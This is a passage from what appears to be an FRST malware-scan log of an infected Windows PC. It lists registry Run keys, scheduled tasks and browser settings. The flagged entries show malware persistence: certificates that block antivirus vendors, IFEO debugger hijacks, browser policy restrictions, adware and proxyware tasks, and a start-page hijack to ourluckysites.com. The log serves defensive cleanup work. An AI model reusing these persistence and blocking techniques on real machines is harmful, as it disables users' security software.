HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Windows] => C:\Users\Public\Public Documents\Windows Movie Player\player.exe [675840 2008-12-07] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4289728 2016-04-04] (Disc Soft Ltd -> Disc Soft Ltd)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.Exe [74144 2012-08-23] (Hewlett-Packard Company -> Hewlett-Packard Company)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [23153344 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Discord] => C:\Users\Radim\AppData\Local\Discord\app-0.0.305\Discord.exe [81780056 2019-03-07] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {504f5f88-f0b9-11e4-bf35-b4b52f8204d5} - "F:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {c6bcc6da-e434-11e3-be7e-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {e1c8640c-1171-11e4-beab-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-18\...\Run: [AviraSpeedup] => "C:\Program Files (x86)\Avira\AviraSpeedup\avira_system_speedup.exe" -autorun
HKLM\...\Drivers32: [msacm.vorbis] => C:\Windows\SysWOW64\vorbis.acm [1554944 2009-09-15] (HMS hxxp://hp.vector.co.jp/authors/VA012897/) [File not signed]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\SysWOW64\vp6vfw.dll [438272 2005-06-24] (EA.com/On2.com) [File not signed]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Startup: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2019-06-12]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\Radim\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook, Inc. -> Facebook)
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy-x32: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {083A6183-4AEF-40C6-8424-1484BF42890F} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {0F689541-D312-4E73-B45C-8D692030573B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {119E7BA2-556A-489D-8CFF-C5C3CCC18174} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {129C9A6F-006B-41B0-944A-0579ACA034CB} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-07-09] (Adobe Inc. -> Adobe)
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {1BFF6763-5417-42C6-A8B9-23DE8C0E01B0} - System32\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6 => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: {1CB785F4-4249-4045-A786-199062EBFDDC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {1DC08E2F-0C21-477E-AE3F-DD9C0239DBE8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [561984 2011-06-01] (Apple Inc. -> Apple Inc.)
Task: {21DF6FEE-21F1-45C2-8462-1FB21D6124AA} - System32\Tasks\Opera scheduled Autoupdate 1555619304 => C:\Users\Radim\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-11] (Opera Software AS -> Opera Software)
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(2): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshContent
Task: {2A9B669F-6742-4A25-8802-D4A53367033E} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(3): C:\WINDOWS\system32\GWX\GWXDetector.exe [ [ ]]
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {411D1741-40BE-4B13-B990-5DA2DD0B71DB} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2281944 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
Task: {41EB1A5B-C29A-47AC-B28A-654DD9754588} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {4405194E-B039-4058-8167-8E4009B02445} - System32\Tasks\Yahoo! Search Updater => C:\Users\Radim\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrsetup.exe <==== ATTENTION
Task: {51C8E8CF-5601-4895-BA14-1F91249AF735} - System32\Tasks\BrickEnforcer-S-1910914952 => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exe <==== ATTENTION
Task: {561B96D9-0C13-46D1-B48C-11B450EDE068} - System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\Program Files (x86)\Call of Duty"
Task: {5A503EF4-4BCD-4DD8-B3EA-3056619CA94E} - System32\Tasks\Wotustupocult Controls => C:\Program Files (x86)\Cooferlydrefeght\wikege.exe [678864 2017-05-14] (Google Inc -> Google Inc.)
Task: {5BAA57CE-4F3B-4FAE-BB82-287C65A24857} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(1): %windir%\system32\GWX\GWXUXWorker.exe -> /ScheduleUpgradeReminderTime
Task: {5BAA57CE-4F3B-4FAE-BB82-287C65A24857} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(2): C:\WINDOWS\system32\GWX\GWXDetector.exe [ [ ]]
Task: {6E67E351-AF06-45F0-ABF6-9326694DB9C3} - System32\Tasks\HPCeeScheduleForRadim => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [91704 2010-09-13] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {7BB75058-32A7-4550-9E35-ADB4BC2794DE} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16835256 2019-07-11] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {7D564906-D4AB-486A-A7CE-35245B2DBC50} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F} - System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A} => C:\WINDOWS\system32\pcalua.exe -a D:\Autorun.exe -d D:\
Task: {816B763C-39A8-4445-8F7C-D009ACBB5D4C} - System32\Tasks\Yahoo! Search => C:\Users\Radim\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrlte.exe <==== ATTENTION
Task: {83EB24E0-F46D-4BD4-BBB0-3FB63AA811EA} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\WINDOWS\system32\GWX\GWXUXWorker.exe
Task: {87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA} - System32\Tasks\{A1783EA8-E469-4557-B18F-2087FFAF942E} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System\bia.exe" -d "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System"
Task: {8A4376A7-45C5-4758-8B4D-D11B4F80822D} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2833504 2017-08-26] (Synaptics Incorporated -> Synaptics Incorporated)
Task: {8F5EA013-4275-4072-A66E-5D725B35544A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [208760 2018-06-27] (HP Inc. -> HP Inc.)
Task: {974067EA-FC62-4E5D-8A34-2E6EC95FDAD5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [88120 2016-02-18] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {9EE2B51A-B4F7-4022-AEA1-E6AAA116B78A} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3940232 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
Task: {A07A2C70-CA2E-45FA-B59D-9FF72C697A86} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_223_Plugin.exe [1457208 2019-07-09] (Adobe Inc. -> Adobe)
Task: {B0A53EFC-2C8B-4563-ACD9-1257D72C0BEE} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [555120 2017-02-07] (MICROLEAVES LTD -> Microleaves LTD) <==== ATTENTION
Task: {B485B28A-1871-4460-83D8-46B833C6442D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_223_pepper.exe [1453112 2019-07-09] (Adobe Inc. -> Adobe)
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079} - System32\Tasks\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Activision\Spider-Man 2\System\Webhead[old].exe" -d "C:\Program Files (x86)\Activision\Spider-Man 2\System"
Task: {C3753944-E90D-499B-9533-7FC6F108AC80} - System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A} => C:\WINDOWS\system32\pcalua.exe -a I:\Launch.exe -d I:\
Task: {CBC69E20-37C7-4C3F-BF31-C6CA3F6CA801} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {D7F8C857-94B7-4D20-99D2-CC6C992D4C27} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Critical Actions Pending => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [524192 2012-08-15] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {D9335A1C-9788-4545-9A3A-118112B149C5} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {E396BF4A-BF40-49B0-8663-6E5A5677A19A} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {EC594B90-2D56-4C16-A5E2-F562DBA81135} - System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\PROGRA~2\Call of Duty"
Task: {F19E069F-E540-4EAD-B789-F6083FF6D85D} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [555120 2017-02-07] (MICROLEAVES LTD -> Microleaves LTD) <==== ATTENTION
Task: {F3AEAD49-EE01-48DF-A58C-3BFF42AB5121} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [651400 2017-09-20] (Hewlett Packard -> HP Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6.job => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exeV/schedule /profile c:\programdata\trusted publisher\premiumaugmenter\1910914952.ini <==== ATTENTION
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRadim.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1
Tcpip\..\Interfaces\{86DF9DE8-986D-4D13-8238-E68CBFD36301}: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1
Tcpip\..\Interfaces\{880E39D8-3E0A-4A45-9DD1-49F1A207180F}: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=14950 ... J9KCB25111
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=14950 ... J9KCB25111
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14950 ... J9KCB25111
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14950 ... J9KCB25111
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?ocid=iehp
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14950 ... J9KCB25111
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {03A35688-219B-40F5-AFC8-7A437C49429D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {09F1332C-51BE-4C3D-9F77-6336BC0ECF20} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0E29DD56-64FC-413E-8F41-5F0535696FDF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1109940C-95FA-4E03-A2F2-A28897FB6766} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14B5528E-A863-4962-9F60-35569D3A1D1C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14E9506E-6D62-4741-9179-44D48CFCD8D2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {16EF7AD8-DB44-443A-BCFB-D50A947D99BF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {171CF743-D4F4-4CB1-87BC-7E191F913FC3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1B8A65AA-BDF6-470E-B140-356633DFA09A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {204DFD3C-EB06-4456-83C5-CCBF1ED48440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2547CEC6-613C-43E4-A593-CC2069084999} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {25BA9130-4A0D-46EF-ADB0-73F1C655CF45} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {26A469EA-AA26-4747-81C6-0E1DBEEB2C13} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C587672-09A4-4A45-9B9B-58A9FE436EF8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C9084D8-A408-42AB-8E29-6BD020D24440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33A41A2E-33C2-4E13-BE84-3559916A6889} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34109212-EC73-44D1-BA1D-E129C381F861} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {3421CDC7-4296-4974-A5F7-B5684D8919B1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34525437-CA15-4A19-9417-26E92976BC39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {365B2F7A-0D50-4476-B107-CB48F4658122} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {380E9DF0-D28C-49C4-BEC9-B7F5FC964664} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {43B1BB36-70BE-4F59-BCA6-F429FCF4137C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45B33A18-F60E-4AE0-9CAC-5967F87CE983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45D166C3-631A-473D-8730-D0ADFD3A6F11} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {464C8606-EF57-4BE1-9060-3966C4EB5C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {4D856560-95D3-4C63-A1AA-AD9802529D26} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5949EADF-9F7D-4C65-8677-313ED03A8983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5E7721A4-8B1A-422D-A170-9A7B384FB535} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {61DCF235-11FE-42E4-B3A5-9777503B4BA7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {659202E6-50F9-46C7-A428-5F75DB77AF0B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {666C57AA-3376-458E-A26F-708CC9B1FF6D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6E2F5E9C-61D5-490B-BE27-DB2989EC9181} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {726310B3-DC05-482A-8873-5CD3627CADFC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {72CDA94A-2548-4F40-B7D2-280600756A39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {74934A3E-ACD6-4B9E-9C4C-C78415A9B457} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {873D163A-C7EE-486E-AD02-F14AB4F425EE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E9D7148-305D-4F6D-A505-EBFB69404960} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8EE27882-ACAA-4340-AEA5-719145283051} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {94700D82-D8C1-42F7-959E-CAD9A16ADBAE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {97CB2411-D33F-411A-9813-127915E7C4E2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A19F8F23-6424-4131-AE98-D1DACF4876CA} URL =
